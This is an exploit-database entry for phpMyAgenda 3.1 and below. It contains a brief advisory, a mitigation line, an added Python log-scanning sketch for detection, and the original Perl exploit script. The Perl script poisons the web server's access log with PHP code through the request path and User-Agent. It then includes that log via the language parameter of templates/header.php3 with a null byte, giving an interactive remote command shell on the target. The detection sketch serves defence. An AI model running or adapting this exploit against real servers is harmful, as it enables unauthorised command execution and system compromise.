Vendor: phpMyAgenda
By: Nima Salehi
CVSS: 7.5 (HIGH)
Multiple Remote Vulnerabilities
CWE: N/A
Product Name: phpMyAgenda
Affected Version From: 3.1 and below
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

phpMyAgenda < 3.1 Multiple Remote Vulnerabilities Exploit

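This exploit works in two steps. It first sends a request whose path and User-Agent header contain PHP code, so that the code is written into the web server's access.log file. It then requests templates/header.php3 with the language parameter pointing at that log file (terminated with a %00 null byte), so that the log is included by the phpMyAgenda application and the injected code can be used to execute arbitrary commands on the vulnerable system.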

Mitigation:

Upgrade to the latest version of phpMyAgenda, or apply the patch provided by the vendor.
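
A detection sketch for the two requests described above, added here as an example (it is not part of the original advisory or exploit): it flags PHP tags written into the access log and language values on templates/header.php3 that are not plain names. The combined log format, the allowlist pattern, the finding labels and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Assumption: the server writes "combined" format access logs.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<req>.*)" \d{3} \S+ '
    r'"[^"]*" "(?P<ua>.*)"$'
)
PHP_TAG = re.compile(r"<\?(php|=|\s)", re.I)
# Assumption: legitimate `language` values are short names such as "english".
SAFE_LANGUAGE = re.compile(r"[A-Za-z0-9_-]{1,32}")

# Constructed sample lines: documentation IPs and a harmless PHP tag.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2006:13:55:36 +0000] "GET /phpMyAgenda/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2006:13:56:01 +0000] "GET /phpMyAgenda/<?php echo(1);?> HTTP/1.1" 404 310 "-" "<?php echo(1);?>"',
    '203.0.113.9 - - [10/Oct/2006:13:56:09 +0000] "GET /phpMyAgenda/templates/header.php3?language=../../../logs/access.log%00 HTTP/1.1" 200 812 "-" "-"',
    '198.51.100.7 - - [10/Oct/2006:13:57:40 +0000] "GET /phpMyAgenda/templates/header.php3?language=english HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]


def classify(line):
    """Return (client_ip, findings) for one access-log line."""
    m = LINE_RE.match(line.rstrip("\r\n"))
    if not m:
        return None, ["unparsed"]
    findings = []
    # Stage 1: PHP code written into the log via the request line or User-Agent.
    for name, value in (("request", m["req"]), ("user-agent", m["ua"])):
        if PHP_TAG.search(unquote(value)):
            findings.append("php-tag-in-" + name)
    # Stage 2: header.php3 asked to load something that is not a language name.
    rest = m["req"].partition(" ")[2]            # drop the method
    target = rest.rpartition(" ")[0] or rest     # drop the protocol, if any
    path, _, query = target.partition("?")
    if path.endswith("templates/header.php3"):
        for value in parse_qs(query, keep_blank_values=True).get("language", []):
            if not SAFE_LANGUAGE.fullmatch(value):
                findings.append("unsafe-language-parameter")
    return m["ip"], findings


def scan(lines):
    """Map each client IP to the set of findings across its requests."""
    hits = {}
    for ip, findings in map(classify, lines):
        if findings:
            hits.setdefault(ip, set()).update(findings)
    return hits
```

A client that shows both a php-tag finding and unsafe-language-parameter in scan() output has sent both stages of the chain and is the highest-priority hit to review.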

Exploit-DB raw data:

#!/usr/bin/perl

use IO::Socket;
use LWP::Simple;

print "\n";
print "#################################################################\n";
print "#                                                               #\n";
print "# phpMyAgenda < 3.1 Multiple Remote Vulnerabilities Exploit     #\n";
print "# Bug found By : Ashiyane Corporation                           #\n";
print "# Email: Nima Salehi    nima[at]ashiyane.ir                     #\n";
print "# Web Site : www.Ashiyane.ir                                    #\n";
print "#                                                               #\n";
print "#################################################################\n";


if (@ARGV < 3)
{
    print "\n Usage: Ashiyane.pl [host] [path] [access.log path]";
    print "\n EX : Ashiyane.pl www.victim.com /phpMyAgenda/ ../../../logs/access.log \n\n";
exit;
}


$host=$ARGV[0];
$path=$ARGV[1];
$accpath=$ARGV[2];


print "Injecting some code in log files...\n";

$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die " Could not connect to host.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "User-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);


print "Type Your Commands ( uname -a )\n";
print "For Exit Type END\n";
print "IF not working try another access.log path\n\n";

print "[shell] ";$cmd = <STDIN>;

while($cmd !~ "END") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";

    print $socket "GET ".$path."templates/header.php3?language=".$accpath."%00&cmd=$cmd HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";

    while ($raspuns = <$socket>)
    {
        print $raspuns;
    }

    print "[shell] ";
    $cmd = <STDIN>;
}

# milw0rm.com [2006-10-10]